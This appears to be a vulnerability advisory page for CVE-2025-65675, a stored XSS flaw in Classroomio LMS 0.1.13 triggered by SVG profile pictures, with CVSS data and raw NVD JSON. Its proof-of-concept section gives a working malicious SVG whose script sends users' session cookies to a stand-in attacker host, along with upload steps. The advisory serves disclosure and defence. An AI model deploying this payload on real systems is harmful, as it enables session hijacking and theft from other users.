Security Vulnerability Report
中文
CVE-2025-65675 CVSS 5.4 MEDIUM

CVE-2025-65675

Published: 2025-11-26 19:15:48
Last Modified: 2025-12-05 14:12:39
Source: [email protected]

Description

Stored Cross site scripting (XSS) vulnerability in Classroomio LMS 0.1.13 allows authenticated attackers to execute arbitrary code via crafted SVG profile pictures.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:classroomio:classroomio:0.1.13:*:*:*:*:*:*:* - VULNERABLE
Classroomio LMS 0.1.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC: Malicious SVG file for CVE-2025-65675 --> <!-- This SVG contains embedded JavaScript that will execute when viewed in browser --> <svg version="1.1" xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> // Steal session cookies and send to attacker-controlled server var cookies = document.cookie; var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://attacker.com/steal?cookie=' + encodeURIComponent(cookies), true); xhr.send(); // Alternative: Display alert for demonstration alert('XSS Vulnerability - CVE-2025-65675'); // DOM manipulation example console.log('Stolen data:', cookies); </script> <circle cx="100" cy="100" r="80" fill="red" /> <text x="50" y="110" font-size="20">Malicious SVG</text> </svg> <!-- Usage: 1. Save this code as malicious.svg 2. Upload as profile picture in Classroomio LMS 3. When other users view your profile, the script executes -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65675", "sourceIdentifier": "[email protected]", "published": "2025-11-26T19:15:48.313", "lastModified": "2025-12-05T14:12:39.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored Cross site scripting (XSS) vulnerability in Classroomio LMS 0.1.13 allows authenticated attackers to execute arbitrary code via crafted SVG profile pictures."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:classroomio:classroomio:0.1.13:*:*:*:*:*:*:*", "matchCriteriaId": "7C6D9D0E-58A9-4468-90E2-3717E4632BF0"}]}]}], "references": [{"url": "http://classroomio.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Rivek619/CVE-2025-65675", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/classroomio/classroomio", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Rivek619/CVE-2025-65675", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.